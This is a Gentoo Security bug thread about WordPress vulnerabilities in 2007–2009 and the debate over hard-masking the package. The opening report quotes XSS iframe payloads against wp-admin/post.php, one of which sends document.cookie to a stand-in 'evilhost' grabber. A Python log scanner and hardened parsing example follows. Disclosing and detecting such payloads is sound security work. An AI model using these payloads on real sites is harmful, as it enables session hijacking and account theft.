
Bug 168529

Summary: www-apps/wordpress security status
Product: Gentoo Security
Reporter: Executioner <keith>
Component: Vulnerabilities
Assignee: Gentoo Security <security>
Status: RESOLVED FIXED
Severity: enhancement
CC: bernd, ferringb, gongloo, gurligebis, hans, jesse, jesus.de.santos, karim, kevin.bowling, mehmet, mgorny, mian.hasan.khalil, moixa, r0bertz, sgtphou, transacid, ulmer, web-apps
Priority: High    
Version: unspecified   
Hardware: All   
OS: Linux   
URL: http://www.securityfocus.com/archive/1/461351
Whiteboard: B4 [maskglsa]
Package list:
Runtime testing required: ---
Bug Depends on:    
Bug Blocks: 199833, 211166    

Description Executioner 2007-02-27 07:02:34 UTC
Exploit:

Cookie in an Alert Box:
<iframe width=600 height=400 src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Clol=%27'></iframe>

Cookie sent to an Evil Host:
<iframe width=600 height=400 src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27'></iframe>

Reproducible: Didn't try

http://www.securityfocus.com/archive/1/461351
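An added example (not from the bug report and not WordPress code): the payloads above put markup into the `post` parameter of wp-admin/post.php, a value that should only ever be a numeric post ID. The script decodes constructed access-log lines, flags that pattern, and shows the hardened handling (parse `post` as an integer, escape anything that must be echoed); the log lines and the `MARKUP_RE` heuristic are assumptions of mine.

```python
# Added example, not from the bug report or from WordPress: detect the
# reported XSS pattern in web-server logs and show the safe way to handle
# the `post` parameter of wp-admin/post.php.
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed common-log-format lines; line 2 carries the URL-encoded payload
# quoted in the bug description, as it would appear in a real access log.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Feb/2007:07:02:34 +0000] "GET /wp-admin/post.php?action=delete&post=42 HTTP/1.1" 302 0
10.0.0.9 - - [27/Feb/2007:07:03:11 +0000] "GET /wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Clol=%27 HTTP/1.1" 200 1832
10.0.0.9 - - [27/Feb/2007:07:04:02 +0000] "GET /wp-admin/post.php?action=edit&post=17 HTTP/1.1" 200 9120
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Heuristic (assumed): markers that have no business in a post ID, checked
# after percent-decoding so encoded payloads do not slip past.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|javascript:|document\.cookie|on\w+\s*=", re.I)


def post_id_or_none(raw: str):
    """Hardened parse: a post ID is a string of digits and nothing else.

    Rejecting non-integers up front means the value is never echoed back
    into the page, which is what the reported payload relies on.
    """
    return int(raw) if raw.isdigit() else None


def classify_request(target: str) -> dict:
    """Decode one request target and judge its `post` value."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes
    raw = params.get("post", [""])[0]
    post_id = post_id_or_none(raw)
    return {
        "path": parts.path,
        "post_raw": raw,
        "post_id": post_id,
        # Suspicious: not an ID and the decoded value looks like markup/script.
        "suspicious": post_id is None and MARKUP_RE.search(raw) is not None,
        # If a rejected value ever had to be displayed, this is the escaped form.
        "safe_echo": html.escape(raw, quote=True),
    }


def scan_log(log_text: str) -> list:
    """Return a record per log line whose post.php request has a suspicious `post`."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m or "/wp-admin/post.php" not in m.group("target"):
            continue
        verdict = classify_request(m.group("target"))
        if verdict["suspicious"]:
            verdict["line_no"] = line_no
            findings.append(verdict)
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line_no']}: post={hit['post_raw']!r} -> escaped {hit['safe_echo']}")
```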
Comment 1 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-03-01 14:31:19 UTC
the ~arched tree is still vulnerable, please mask the vulnerable ebuild or ~keyword 2.1.1. (Or, both)


Should we issue a GLSA?

Personally I tend to think we should issue a GLSA warning our users that wordpress is no longer security-supported (either it's put in p.mask or in ~arch)
Comment 2 Stefan Cornelius (RETIRED) gentoo-dev 2007-03-01 14:51:14 UTC
I'm pro-mask. I simply can't recommend anyone to use this app - if users want it, then they still can unmask...
Comment 3 Jesus de Santos Garcia 2007-03-03 01:32:34 UTC
Bad days for wordpress. Now, an exploit that was added by a cracker.

http://wordpress.org/development/2007/03/upgrade-212/

Does this affect gentoo?
Comment 4 Jakub Moc (RETIRED) gentoo-dev 2007-03-03 09:49:23 UTC
(In reply to comment #3)
> Bad days for wordpress. Now, an exploit that was added by a cracker.
> http://wordpress.org/development/2007/03/upgrade-212/
> Does this affect gentoo?

We've already noticed. Pretty much hard to say, no one upstream bothered to provide the hashes of 'genuine' vs. 'cracked' files. This thing needs to be completely masked and possibly just removed from portage; upstream can't be much more lame than this. :X
Comment 5 Matthias Geerdsen (RETIRED) gentoo-dev 2007-03-06 14:26:58 UTC
just found this by coincidence...

# Stefan Cornelius <dercorny@gentoo.org> (3 Mar 2007)
# Masking wordpress due to a long list of security bugs
# e.g. check bug #168529
www-apps/wordpress


since it seems to be masked now... do we want a mask glsa?
Comment 6 Matthew Dirks 2007-03-06 19:46:26 UTC
Does this really need to be hard-masked? A major XSS vulnerability (at least the
other one reported in bug #168449) is reportedly fixed now in 2.1.2. Also only
the 2.1.1 package was tampered with and even that was only vulnerable from
between 2007-02-25 and 2007-03-02. Version 2.1.2 has replaced 2.1.1 due to the
tampering.

Also, I'm sure Wordpress could provide some digests of their "genuine" archive
files if asked to guard from future tampering.

At the least maybe arch-mask this across the board instead of hard-mask it
since the security issues are *well* documented in other locations as well.
Comment 7 Matt Drew (RETIRED) gentoo-dev 2007-03-07 17:56:35 UTC
some additional, related vulnerabilities:

http://www.fadetoblack.ch/advisories/wordpress_2.1.1_multiple_script_injection_vulnerabilities.txt

I'll vote for a GLSA - people need to know that Wordpress is no longer going to be supported, it's a popular webapp.
Comment 8 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-03-09 22:35:24 UTC
(In reply to comment #7)
> some additional, related vulnerabilities:
> 
> http://www.fadetoblack.ch/advisories/wordpress_2.1.1_multiple_script_injection_vulnerabilities.txt
> 
> I'll vote for a GLSA - people need to know that Wordpress is no longer going to
> be supported, it's a popular webapp.
> 


i agree. Furthermore, there have been other security issues in the meantime.


GLSA request filed
Comment 9 Matthew Dirks 2007-03-13 16:52:41 UTC
It should be noted that this vulnerability was filed within the date range that the tampered 2.1.1 file was available (2007-2-25 to 2007-3-2). 

If this is still the case in 2.1.2, then that's fine. Otherwise this shouldn't be grounds for masking 2.1.2 as well. 

Technically you could probably just outright remove 2.1.1 from the portage tree since it no longer exists as far as a version you can download from the wordpress.org site.

As far as 2.1.2 I still think arch mask is more fitting from a user's perspective. Hard mask to me implies either a development version or outright "unstable" behavior. For example, Joe user tries to use a common feature in an everyday kind of way (i.e. not injecting various SQL statements in odd places) and the software breaks something or outright crashes. This seems to be reinforced by the Gentoo Development Guide (http://devmanual.gentoo.org/keywording/):

"The package.mask file can be used to 'hard mask' individual or groups of ebuilds. This should be used for testing ebuilds or beta releases of software, and may also be used if a package has serious compatibility problems. Packages which are not hard masked must not have a dependency upon hard masked packages.

The only time it is acceptable for a user to see the Possibly a DEPEND problem error message is if they have manually changed visibility levels for a package (for example, through /etc/portage/) and have missed a dependency. You should never commit a change which could cause this error to appear on a user system."


 ... This is not so much "unstable" as it is "security flawed" and finding such flaws is more indicative of simple arch mask ... not a hard mask as the Development Guide would seem to dictate. 

Either way a GLSA is a good step, I have no issue there. My only issue is with the level of masking on the 2.1.2 version.
Comment 10 Matthew Dirks 2007-03-13 17:00:47 UTC
Oops. 2.1.1 is already removed. You can disregard that part of my post.
Comment 11 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-03-14 00:27:08 UTC
(In reply to comment #6)
> Does this really need to be hard-masked? A major XSS vulnerability (at least the
> other one reported in bug #168449) is reportedly fixed now in 2.1.2. Also only
> the 2.1.1 package was tampered with and even that was only vulnerable from
> between 2007-02-25 and 2007-03-02. Version 2.1.2 has replaced 2.1.1 due to the
> tampering.
> 


I really don't know why all those people discovered so many vulnerabilities in wordpress during those last few weeks, see:
http://secunia.com/search/?search=wordpress
and 
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress
That's impressive.

Wordpress definitely can't be considered as a stable package (arched) nor as a for-stable-testing package (~arched)
Comment 12 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-03-14 00:27:35 UTC
*** Bug 168449 has been marked as a duplicate of this bug. ***
Comment 13 Matthew Dirks 2007-03-15 15:37:43 UTC
(In reply to comment #11)
> (In reply to comment #6)
> > Does this really need to be hard-masked? A major XSS vulnerability (at least the
> > other one reported in bug #168449) is reportedly fixed now in 2.1.2. Also only
> > the 2.1.1 package was tampered with and even that was only vulnerable from
> > between 2007-02-25 and 2007-03-02. Version 2.1.2 has replaced 2.1.1 due to the
> > tampering.
> > 
> 
> 
> I really don't know why all those people discovered so many vulnerabilities
> in wordpress during those last few weeks, see:
> http://secunia.com/search/?search=wordpress
> and 
> http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress
> That's impressive.
> 
> Wordpress definitely can't be considered as a stable package (arched) nor as a
> for-stable-testing package (~arched)
> 

You can't just look at the number of results just by searching "wordpress", say "Wow, that's a lot. This product must be really unstable", and leave it at that. Many of the vulnerabilities listed are for *much older versions* (i.e. previous to even 2.0). In at least one case on cve.mitre.org, there was a vulnerability that didn't have anything to do with Wordpress itself and yet it showed up in the search because it's just a simple partial text search (for example: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0574 ). Two of the CVE vulnerabilities cite the same sources and are really two symptoms of the same vulnerability ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0540 and http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0541 ) and even those are more a problem with the 3rd party pingback function that wordpress uses rather than wordpress itself (they had a couple issues with their implementation of it on top of the vulnerability but that has been fixed since version 2.1).

After looking through any listings that remotely appeared to possibly affect the current version (I think 2.0.9 could probably be dumped from the portage tree at this point) I've cut the list down to 3 "internal" vulnerabilities and one "external" vulnerability (i.e. the previously mentioned "pingback" vulnerability URLs) and even some of the internal vulnerabilities can be corrected by blocking the direct access of certain files through .htaccess.

URLs for "current" vulnerabilities:
http://secunia.com/advisories/24316/
http://secunia.com/advisories/24430/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1409


There was also one other "unfixed" vulnerability listed, but it's a pretty trivial one that's only valid for manual brute-force type attacks. It concerns differing error messages for bad user names and bad passwords. It may have been fixed by now (it was reported on version 2.0.5) 
URL: http://secunia.com/advisories/23621/

Comment 14 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-03-15 21:52:32 UTC
too long for my tired eyes, sorry. Perhaps the maintainer will choose to put it back into ~arch later, we'll see.
Comment 15 Steve Dibb (RETIRED) gentoo-dev 2007-03-16 23:00:17 UTC
(In reply to comment #14)
> too long for my tired eyes, sorry. Perhaps the maintainer will choose to put
> it back into ~arch later, we'll see.
> 

Can we please close the security bugs now that it's hard masked?

I'm not going to kill the 2.0.x branch since upstream is backporting security patches to it.

And I'm not going to unmask it anytime soon since 2.0.5 through 2.0.9 were all security bugfix releases coming out on average two weeks apart each.
Comment 16 Stephen Ulmer 2007-03-17 16:09:26 UTC
The hard mask is:

  www-apps/wordpress

it seems to me that it should have been

  <www-apps/wordpress-2.1.2

Wordpress is, in general, a good product with an extremely active user community and good upstream maintenance.  Additionally, the security problem with 2.1.1 wasn't with Wordpress itself, but the site from which wordpress is distributed. Wordpress is certainly not "unstable".

Hard masking all of Wordpress does not seem like a response measured against the actual risk. Please consider changing the mask as above.

Thank you.
Comment 17 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2007-03-25 07:33:54 UTC
GLSA 200703-23

Moving to enhancement pending resolution.

Steve please comment here if you unmask or remove future versions.
Comment 18 Jesus de Santos Garcia 2007-04-03 13:42:35 UTC
http://wordpress.org/development/2007/04/wordpress-213-and-2010/

Wordpress 2.1.3 and 2.0.10

We have a security update release now available for both the 2.1 and 2.0 branches of WordPress now available for immediate download. This update is highly recommend for all users of both branches.

----------


Lots of people are using wordpress. We should at least update the ebuild although it is marked as masked.

Comment 19 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2007-04-03 14:49:20 UTC
web-apps what do you say?
Comment 20 Hans Rakers 2007-04-09 18:22:52 UTC
For people that don't want to/can't wait much longer, copying the ebuild for 2.1.2 in an overlay and renaming it to wordpress-2.1.3.ebuild works just fine.
Comment 21 Steve Dibb (RETIRED) gentoo-dev 2007-04-10 13:17:12 UTC
(In reply to comment #18)
> http://wordpress.org/development/2007/04/wordpress-213-and-2010/
> 
> Wordpress 2.1.3 and 2.0.10
> 
> We have a security update release now available for both the 2.1 and 2.0
> branches of WordPress now available for immediate download. This update is
> highly recommend for all users of both branches.

New ebuilds in CVS
Comment 22 Rescue9 2007-04-21 23:00:19 UTC
(In reply to comment #21)
> New ebuilds in CVS

Does this mean it's going to be unmasked?

Comment 23 Steve Dibb (RETIRED) gentoo-dev 2007-04-23 23:03:00 UTC
(In reply to comment #22)
> (In reply to comment #21)
> > New ebuilds in CVS
> 
> Does this mean it's going to be unmasked?
> 

No.

Can we close the bug?
Comment 24 Matthew Dirks 2007-04-24 12:43:44 UTC
(In reply to comment #23)
> (In reply to comment #22)
> > (In reply to comment #21)
> > > New ebuilds in CVS
> > 
> > Does this mean it's going to be unmasked?
> > 
> 
> No.
> 
> Can we close the bug?
> 

If you're wanting to close the bug, then why not unmask it??? I mean what's the sense of keeping it masked if 2.1.3 and 2.0.10 are supposed to fix all the XSS issues?
Comment 25 Steve Dibb (RETIRED) gentoo-dev 2007-04-26 19:32:01 UTC
(In reply to comment #24)
> (In reply to comment #23)
> > (In reply to comment #22)
> > > (In reply to comment #21)
> > > > New ebuilds in CVS
> > > 
> > > Does this mean it's going to be unmasked?
> > > 
> > 
> > No.
> > 
> > Can we close the bug?
> > 
> 
> If you're wanting to close the bug, then why not unmask it??? I mean what's the
> sense of keeping it masked if 2.1.3 and 2.0.10 are supposed to fix all the XSS
> issues?
> 

Sorry, I like wordpress as much as the next guy, but it has had a poor security track recently, which led us to p.mask it in the first place.

If things improve in the future, we'll look at it again, but now's not the time.
Comment 26 Matthew Dirks 2007-04-26 21:18:09 UTC
(In reply to comment #25)
> (In reply to comment #24)
> > (In reply to comment #23)
> > > (In reply to comment #22)
> > > > (In reply to comment #21)
> > > > > New ebuilds in CVS
> > > > 
> > > > Does this mean it's going to be unmasked?
> > > > 
> > > 
> > > No.
> > > 
> > > Can we close the bug?
> > > 
> > 
> > If you're wanting to close the bug, then why not unmask it??? I mean what's the
> > sense of keeping it masked if 2.1.3 and 2.0.10 are supposed to fix all the XSS
> > issues?
> > 
> 
> Sorry, I like wordpress as much as the next guy, but it has had a poor security
> track recently, which led us to p.mask it in the first place.
> 
> If things improve in the future, we'll look at it again, but now's not the
> time.
> 

I guess it makes some sense when you put it that way. As long as there's fair chance for the software to "redeem" itself, then I guess there's not as much of a problem. I'll just have to keep my "www-apps/wordpress" entry in package.unmask for a little while longer :-). I'm just hoping the hard mask doesn't "scare off" some people as much as ... say ... an alpha release of most any Microsoft product ( or beta ...  or perhaps even "stable" depending on your point of view )
Comment 27 FieldySnuts 2007-04-26 21:30:13 UTC
I know this just creates what I'm actually asking to stop... Can we have this be a bug, and not a forum? Thank you :)
Comment 28 Eric Herot 2007-07-10 21:48:22 UTC
Two weeks ago WordPress released a major security update in 2.2.1.  Any chance of changing the hard/whole package mask to a "<www-apps/wordpress-2.2.1" mask?

See: http://wordpress.org/support/topic/122939
Comment 29 Jesus de Santos Garcia 2007-07-11 13:31:24 UTC
(In reply to comment #28)
> Two weeks ago WordPress released a major security update in 2.2.1.  Any chance
> of changing the hard/whole package mask to a "<www-apps/wordpress-2.2.1" mask?
> 
> See: http://wordpress.org/support/topic/122939
> 

My vote for it

Comment 30 Tobias Scherbaum (RETIRED) gentoo-dev 2007-07-11 17:27:43 UTC
(In reply to comment #28)
> Two weeks ago WordPress released a major security update in 2.2.1.  Any chance
> of changing the hard/whole package mask to a "<www-apps/wordpress-2.2.1" mask?
> 
> See: http://wordpress.org/support/topic/122939
> 

As long as every little new Wordpress release contains security-relevant fixes I'd say: no.
Comment 31 Hans Rakers 2007-08-08 08:28:20 UTC
And it's that time of the month again :P

http://wordpress.org/development/2007/08/wordpress-222-and-2011/

New release including 2 security related fixes (XSS and SQL injection).
Comment 32 Tobias Scherbaum (RETIRED) gentoo-dev 2007-08-08 08:45:22 UTC
(In reply to comment #31)
> And it's that time of the month again :P
> 
> http://wordpress.org/development/2007/08/wordpress-222-and-2011/
> 
> New release including 2 security related fixes (XSS and SQL injection).
> 

... and as usual just copying the ebuild works fine.
Comment 33 Steve Dibb (RETIRED) gentoo-dev 2007-08-11 22:16:53 UTC
(In reply to comment #32)
> (In reply to comment #31)
> > And it's that time of the month again :P
> > 
> > http://wordpress.org/development/2007/08/wordpress-222-and-2011/
> > 
> > New release including 2 security related fixes (XSS and SQL injection).
> > 
> 
> ... and as usual just copying the ebuild works fine.
> 

thanks, bumped

Comment 34 Gunnar Wrobel (RETIRED) gentoo-dev 2007-10-30 12:19:04 UTC
Can this bug be closed? If not, and it should be kept open as a reference that removal of the hard mask of wordpress might be just temporary, then I suggest modifying the topic so that this becomes clear.
Comment 35 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2007-10-30 14:11:48 UTC
This bug should stay open until the mask is removed and we'd likely need to issue a new GLSA at that point.

wrobel feel free to change the title if you have one that suits better, I need more coffee here:)
Comment 36 Robert Buchholz (RETIRED) gentoo-dev 2007-10-30 16:21:39 UTC
(In reply to comment #35)
> This bug should stay open until the mask is removed and we'd likely need to
> issue a new GLSA at that point.
> 
> wrobel feel free to change the title if you have one that suits better, I need
> more coffee here:)

The p.mask is removed for >=2.3, but those are not stable.
Comment 37 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2007-10-30 18:26:36 UTC
Hmmm I guess we'll have to wait until it is stable again (if ever).
Comment 38 Gunnar Wrobel (RETIRED) gentoo-dev 2008-02-05 12:13:33 UTC
In the light of #208980 and the fact that this app had a number of sec issues during the months it has been unmasked the question has come up whether we completely move this app into the webapp-experimental overlay.

I don't mind bumping wordpress once in a while but I also don't feel it is too good if we tell our users that this is a usable app.

How does security feel about wordpress?
Comment 39 Pierre-Yves Rofes (RETIRED) gentoo-dev 2008-02-05 12:40:39 UTC
(In reply to comment #38)
> In the light of #208980 and the fact that this app had a number of sec issues
> during the months it has been unmasked the question has come up whether we
> completely move this app into the webapp-experimental overlay.
> 
> I don't mind bumping wordpress once in a while but I also don't feel it is too
> good if we tell our users that this is a usable app.
> 
> How does security feel about wordpress?
> 

Like you said, new wordpress vulns pop up every month, so IMO it should stay p.masked. The webapp-experimental sounds like a plan.
Comment 40 Robert Buchholz (RETIRED) gentoo-dev 2008-02-11 23:00:17 UTC
I don't think it needs to move to an experimental overlay, if it is p.masked.
Comment 41 Gunnar Wrobel (RETIRED) gentoo-dev 2008-02-15 09:43:58 UTC
Okay, hard mask applied again.
Comment 42 Karim 2008-04-04 08:08:04 UTC
Wordpress 2.5 has been released. http://wordpress.org/latest.tar.gz
Would appreciate to see it included in portage tree.
Thanks!
Comment 43 Gunnar Wrobel (RETIRED) gentoo-dev 2008-04-27 06:03:43 UTC
(In reply to comment #42)
> Wordpress 2.5 has been released. http://wordpress.org/latest.tar.gz
> Would appreciate to see it included in portage tree.
> Thanks!
> 

2.5.1 in the tree
Comment 44 Robert Buchholz (RETIRED) gentoo-dev 2008-05-02 09:52:30 UTC
*** Bug 219912 has been marked as a duplicate of this bug. ***
Comment 45 Zhang Le (RETIRED) gentoo-dev 2008-05-27 19:43:31 UTC
Is there any other open vulnerabilities?
If not, shall we unmask it?
Thanks!
Comment 46 Bjarke Istrup Pedersen (RETIRED) gentoo-dev 2008-07-22 14:59:45 UTC
2.6 has been released, what's the status of that one?
Comment 47 Gunnar Wrobel (RETIRED) gentoo-dev 2008-08-01 17:24:56 UTC
Added wordpress-2.6. Let's see how this one fares during the next months but I don't really expect less sec bugs.
Comment 48 Hasan Khalil 2008-08-21 21:32:50 UTC
2.6.1 is out, would love to see it added to the tree.
Comment 49 Robert Buchholz (RETIRED) gentoo-dev 2008-09-09 14:46:37 UTC
2.6.2 is out, fixing a SQL column truncation issue that allows for user password reset.
Comment 50 Stefan Behte (RETIRED) gentoo-dev Security 2008-11-18 18:58:32 UTC
Another one: #247468 :/
Comment 51 Stefan Behte (RETIRED) gentoo-dev Security 2008-11-29 10:54:24 UTC
Another one: CVE-2008-5278
Luckily, we've only got 2.6.5 in tree.
Comment 52 Kevin Bowling 2008-12-12 05:11:43 UTC
How about Wordpress 2.7?  Hopefully it will have a better security record :D.
Comment 53 Peter Volkov (RETIRED) gentoo-dev 2008-12-26 07:41:34 UTC
Probably wordpress improved these days and upstream is working on bugs. What about unmasking it? I'm going to do this if nobody objects.
Comment 54 Stefan Behte (RETIRED) gentoo-dev Security 2008-12-26 09:43:16 UTC
Also CVE-2008-5695.
I'm against stabilizing it, as wordpress has too long a security record for my taste. If there are no bugs for three months I might change my mind, though.
Comment 55 Tobias Scherbaum (RETIRED) gentoo-dev 2008-12-26 09:56:11 UTC
(In reply to comment #54)
> Also CVE-2008-5695.
> I'm against stabilizing it, as wordpress has too long a security record for my
> taste. If there are no bugs for three months I might change my mind, though.
> 

There's a difference between unmasking it (like Peter suggested) and stabilizing Wordpress. 
Comment 56 Kevin Bowling 2008-12-26 11:56:47 UTC
3 _months_ for a php app?  Not going to happen :).  I agree that it should be unmasked.  There is probably no reason to stabilize a package like this because changes will be so frequent, however, unless the policy were to be different (i.e. minor releases pushed stable immediately).

FWIW in recent times it has been no worse than Drupal or Mediawiki.
Comment 57 Stefan Behte (RETIRED) gentoo-dev Security 2008-12-26 14:28:24 UTC
Uuuh, why did I read stabilize there?
Unmasking might be ok, but I'm against stabling.
Comment 58 Tobias Heinlein (RETIRED) gentoo-dev 2008-12-26 15:44:40 UTC
(In reply to comment #57)
> Uuuh, why did I read stabilize there?
> Unmasking might be ok, but I'm against stabling.
> 

I agree.
Comment 59 Peter Volkov (RETIRED) gentoo-dev 2008-12-30 14:55:25 UTC
unmasked. Let's close this bug, noglsa since wordpress is now an unstable package.
Comment 60 Pierre-Yves Rofes (RETIRED) gentoo-dev 2009-01-11 19:17:42 UTC
ok, closing since it's now unmasked. We'll open new bugs as new issues pop up.